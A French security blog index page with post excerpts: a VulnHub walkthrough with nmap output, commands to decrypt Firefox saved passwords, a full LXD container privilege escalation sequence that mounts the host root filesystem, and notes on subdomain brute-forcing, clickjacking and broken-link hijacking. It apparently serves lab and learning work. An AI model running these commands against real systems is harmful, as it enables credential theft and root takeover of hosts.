Résolution du petit puzzle de la machine virtuelle pylington sur vulnhub

On scanne, on obtient # Nmap 7.91 scan initiated Sun Jun 13 18:46:39 2021 as: nmap -sC -sV -oV 192.168.2.172 Nmap scan report for 192.168.2.172 Host is up (0.0040s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.5 (protocol 2.0) | ssh-hostkey: | 3072 bf:ba:23:4e:69:37:69:9f:23:ae:21:35:98:4d:39:fa (RSA) | 256 ed:95:53:52:ef:70:1f:c0:0e:3c:d8:be:35:fc:3a:93 … Continuer la lecture

Décrypter les mots de passe de firefox

https://github.com/unode/firefox_decrypt python3 firefox_decrypt.py /home/germain/.mozilla/firefox Il existe aussi un module dans metasploit use multi/gather/firefox_creds set session 1 run python firefox_decrypt.py ./ #on renomme les fichiers correctement (voir la console de metasploit). on copie les fichiers dans le répertoire courant . ex. cert9.db, cookies.sqlite,key4.db,logins.json

Le protocole HTTP3

Apache et d’autres serveurs http peuvent retourner une réponse différente si nous utilisons le protocole HTTP3. Ce n’est pas un protocole fréquemment utilisé et les clients HTTP3 sont plutôt rares. L’utilitaire curl supporte ce protocole, mais il faut le compiler avec les options nécessaires. Voici une façon de compiler les librairies nécessaires et de construire … Continuer la lecture

Vulnérabilité LXC

wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine chmod u+x build-alpine lxc image import ./alpine-v3.13-x86_64-20210405_2328.tar.gz –alias myimage lxd init alpine:v3.12 mypool lxc init myimage ignite -c security.privileged=true lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true lxc start ignite lxc exec ignite /bin/sh cd /mnt/root/root Le répertoire /mnt/root est le système de fichier root de l’hôte Il suffit maintenant de … Continuer la lecture

Hijackings de liens inexistants

Outil pour trouver des liens cassés https://github.com/stevenvachon/broken-link-checker.git blc -rof –filter-level 3 https://www.searchevolution.com Script pour trouver des domaines expirés dans les tweets https://github.com/misterch0c/twitterBFTD Resources : https://edoverflow.com/2017/broken-link-hijacking/ https://deadlinkchecker.com/website-dead-link-checker.asp Extension pour google chrome : Broken Link Checker

Clickjacking vulnerabilité

Façon manuelle de vérifier si un site est vulnérable à ce type de vulnérabilités Clickjacking testing Website is vulnerable to clickjacking! Vérification automatique pour la vulnérabilité clickjacking samy.pl/quickjack/quickjack.html https://www.securityheaders.com (vérifie pour les entêtes http pour la sécurité sont utilisés : Strict-Transport-Security, Content-Security-Policy, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy) Interdire le chargement d’un site via iframe : X-Frame-Options … Continuer la lecture

Découvrir les sous-domaines

On peut tenter de trouver les sous-domaines par bruteforce gobuster vhost -u http://searchevolution.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt | grep -v "Status: 400" ffuf -fc 301 -c -u 'http://rocket.thm/' -H 'Host: FUZZ.rocket.thm' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt Sur Google: site:mytarget.com -www On peut essayer avec inurl:adm , inurl:dev, inurl:admin pentest-tools.com spyce.com crt.sh (%.tesla.com) Autres outils Subfinder Amass Sublister Aquatone Knockpy Findomain … Continuer la lecture